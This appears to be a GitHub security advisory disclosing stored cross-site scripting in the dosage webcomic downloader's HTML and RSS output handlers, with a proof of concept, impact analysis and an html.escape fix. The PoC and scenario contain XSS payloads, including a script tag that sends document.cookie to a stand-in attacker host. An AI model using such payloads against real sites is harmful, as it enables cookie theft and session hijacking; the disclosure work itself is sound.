Skip to content

Dosage Vulnerable to Stored Cross-Site Scripting (XSS) in HTML/RSS Output Handlers

Moderate severity GitHub Reviewed Published May 24, 2026 in webcomics/dosage • Updated Jun 26, 2026

Package

pip dosage (pip)

Affected versions

<= 3.2

Patched versions

3.3

Description

Summary

The HTML and RSS output handlers in dosagelib/events.py write user-controlled content (comic text and page URLs) directly into generated files without proper HTML escaping. When a user scrapes a malicious webcomic and opens the generated HTML/RSS file, attacker-controlled JavaScript can execute in their browser.

CWE: CWE-79 - Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)


Details

Vulnerable Code Locations

The vulnerability exists in dosagelib/events.py where untrusted content is written to HTML/RSS output without escaping:

1. RSSEventHandler (lines 116-118)

# events.py:116-118
if comic.text:
    description += '<br/>%s' % comic.text        # ← Unescaped comic.text
description += '<br/><a href="%s">View Comic Online</a>' % pageUrl  # ← Unescaped URL

2. HtmlEventHandler (lines 232, 238)

# events.py:232
self.html.write(u'<li><a href="%s">%s</a>\n' % (pageUrl, pageUrl))  # ← Unescaped URL

# events.py:238
if text:
    self.html.write(u'<br/>%s\n' % text)  # ← Unescaped text

Root Cause

  • BasicScraper.fetchText() in scraper.py:422 calls html.unescape() on extracted text
  • The output handlers never call html.escape() before writing to files
  • No sanitization of URLs or text content occurs anywhere in the output pipeline

Data Flow

Malicious webcomic page
    ↓
textSearch XPath extracts content (e.g., img/@title, div text)
    ↓
BasicScraper.fetchText() calls html.unescape()
    ↓
comic.text stored without sanitization
    ↓
HtmlEventHandler/RSSEventHandler writes to file without html.escape()
    ↓
Generated HTML/RSS contains executable JavaScript

PoC

I created a proof-of-concept that demonstrates the vulnerability by simulating a malicious comic source.

Prerequisites

  • Docker installed and running

PoC Files

Create these files in a poc/ directory:

1. poc/Dockerfile

FROM python:3.11-slim

LABEL description="PoC for dosage Stored XSS vulnerability (CWE-79)"

WORKDIR /app
COPY . /app

# Install dependencies
RUN pip install --no-cache-dir --quiet imagesize lxml requests rich platformdirs

# Install dosage
ENV SETUPTOOLS_SCM_PRETEND_VERSION_FOR_DOSAGE=0.0.0
RUN pip install --no-cache-dir --quiet .

CMD ["python", "poc/poc.py"]

2. poc/poc.py

#!/usr/bin/env python3
"""
PoC: Stored XSS in dosage HTML/RSS Output Handlers
Demonstrates that untrusted comic content is written to output files unescaped.
"""

import sys
from pathlib import Path
from types import SimpleNamespace

from dosagelib.events import HtmlEventHandler, RSSEventHandler

# XSS payloads simulating malicious webcomic content
MALICIOUS_TEXT = "Funny Comic!<script>fetch('http://attacker.com/?c='+document.cookie)</script>"
MALICIOUS_URL = "javascript:alert('XSS-via-URL')"

def check_vulnerability(content: str, marker: str, description: str) -> bool:
    """Check if unescaped marker appears in content."""
    if marker.lower() in content.lower():
        print(f"  [VULNERABLE] {description}")
        print(f"               Found unescaped: {marker}")
        return True
    print(f"  [SAFE] {description}")
    return False

def main():
    print("=" * 70)
    print("PoC: Stored XSS in dosage HTML/RSS Output Handlers")
    print("=" * 70)
    print()

    base = Path(__file__).parent / "output"
    base.mkdir(parents=True, exist_ok=True)

    # Create dummy image file
    img_path = base / "payload.png"
    img_path.write_bytes(b"\x89PNG\r\n\x1a\n")

    # Simulate comic with malicious content
    comic = SimpleNamespace(
        scraper=SimpleNamespace(name="MaliciousComic"),
        referrer=MALICIOUS_URL,
        text=MALICIOUS_TEXT,
        url="http://example.com/comic.png"
    )

    vulnerabilities_found = 0

    # Test RSS Handler
    print("[*] Testing RSSEventHandler...")
    rss_handler = RSSEventHandler(str(base), None, False)
    rss_handler.start()
    rss_handler.comicDownloaded(comic, str(img_path))
    rss_handler.end()
    
    rss_path = Path(rss_handler.rssfn)
    rss_content = rss_path.read_text(encoding="utf-8")
    print(f"    Output file: {rss_path}")
    
    if check_vulnerability(rss_content, "javascript:", "pageUrl in RSS href"):
        vulnerabilities_found += 1

    # Test HTML Handler  
    print()
    print("[*] Testing HtmlEventHandler...")
    html_handler = HtmlEventHandler(str(base), None, False)
    html_handler.start()
    html_path = Path(html_handler.html.name)
    html_handler.comicDownloaded(comic, str(img_path), text=MALICIOUS_TEXT)
    html_handler.end()

    html_content = html_path.read_text(encoding="utf-8")
    print(f"    Output file: {html_path}")
    
    if check_vulnerability(html_content, "<script>", "text param in HTML"):
        vulnerabilities_found += 1
    if check_vulnerability(html_content, "javascript:", "pageUrl in HTML link"):
        vulnerabilities_found += 1

    # Show vulnerable content
    print()
    print("-" * 70)
    print("Vulnerable Content in Generated HTML:")
    print("-" * 70)
    for line in html_content.splitlines():
        if "<script>" in line.lower() or "javascript:" in line.lower():
            print(f"  {line}")

    print()
    print("=" * 70)
    print(f"RESULT: {vulnerabilities_found} XSS vulnerability vectors confirmed!")
    print("=" * 70)
    
    return 0 if vulnerabilities_found > 0 else 1

if __name__ == "__main__":
    sys.exit(main())

3. poc/run_poc.sh

#!/usr/bin/env bash
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
ROOT_DIR="$(cd "${SCRIPT_DIR}/.." && pwd)"

echo "[*] Building PoC Docker image..."
docker build -t dosage-xss-poc -f "${SCRIPT_DIR}/Dockerfile" "${ROOT_DIR}" --quiet

echo "[*] Running PoC..."
docker run --rm dosage-xss-poc

echo "[*] Cleanup: docker rmi dosage-xss-poc"

Running the PoC

cd /path/to/dosage
chmod +x poc/run_poc.sh
./poc/run_poc.sh

PoC Output

======================================================================
PoC: Stored XSS in dosage HTML/RSS Output Handlers
======================================================================

[*] Testing RSSEventHandler...
    Output file: /app/poc/output/dailydose.rss
  [VULNERABLE] pageUrl in RSS href
               Found unescaped: javascript:

[*] Testing HtmlEventHandler...
    Output file: /app/poc/output/html/comics-20251210.html
  [VULNERABLE] text param in HTML
               Found unescaped: <script>
  [VULNERABLE] pageUrl in HTML link
               Found unescaped: javascript:

----------------------------------------------------------------------
Vulnerable Content in Generated HTML:
----------------------------------------------------------------------
  <li><a href="javascript:alert('XSS-via-URL')">javascript:alert('XSS-via-URL')</a>
  <br/>Funny Comic!<script>fetch('http://attacker.com/?c='+document.cookie)</script>

======================================================================
RESULT: 3 XSS vulnerability vectors confirmed!
======================================================================

The output shows that:

  1. The javascript: URL is written directly into <a href> attributes
  2. The <script> tag from comic text appears unescaped in the HTML body

Impact

Who is affected?

  • Users who use dosage --output html or dosage --output rss options
  • Anyone who opens the generated HTML/RSS files in a browser

Attack scenario

  1. Attacker creates or compromises a webcomic site
  2. Attacker injects JavaScript into image title/alt attributes:
    <img src="comic.png" title="Funny!<script>alert(1)</script>">
  3. Victim runs: dosage MaliciousComic --output html
  4. The generated Comics/html/comics-YYYYMMDD.html contains the unescaped script
  5. When victim opens the file, JavaScript executes

Potential consequences

  • Cookie theft if files are served over HTTP
  • Local file access via file:// protocol
  • Phishing attacks through DOM manipulation

Recommended Fix

Escape all user-controlled content before writing to HTML/RSS:

import html

# In RSSEventHandler.comicDownloaded() - events.py around line 116:
if comic.text:
    description += '<br/>%s' % html.escape(comic.text)
description += '<br/><a href="%s">View Comic Online</a>' % html.escape(pageUrl)

# In HtmlEventHandler.comicDownloaded() - events.py around line 232:
self.html.write(u'<li><a href="%s">%s</a>\n' % (html.escape(pageUrl), html.escape(pageUrl)))

# events.py around line 238:
if text:
    self.html.write(u'<br/>%s\n' % html.escape(text))

For URLs, validating that they use safe protocols (http://, https://) would also help prevent javascript: URLs.


Resources


References

@TobiX TobiX published to webcomics/dosage May 24, 2026
Published to the GitHub Advisory Database Jun 26, 2026
Reviewed Jun 26, 2026
Last updated Jun 26, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS score

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-75mw-h36v-2jv7

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.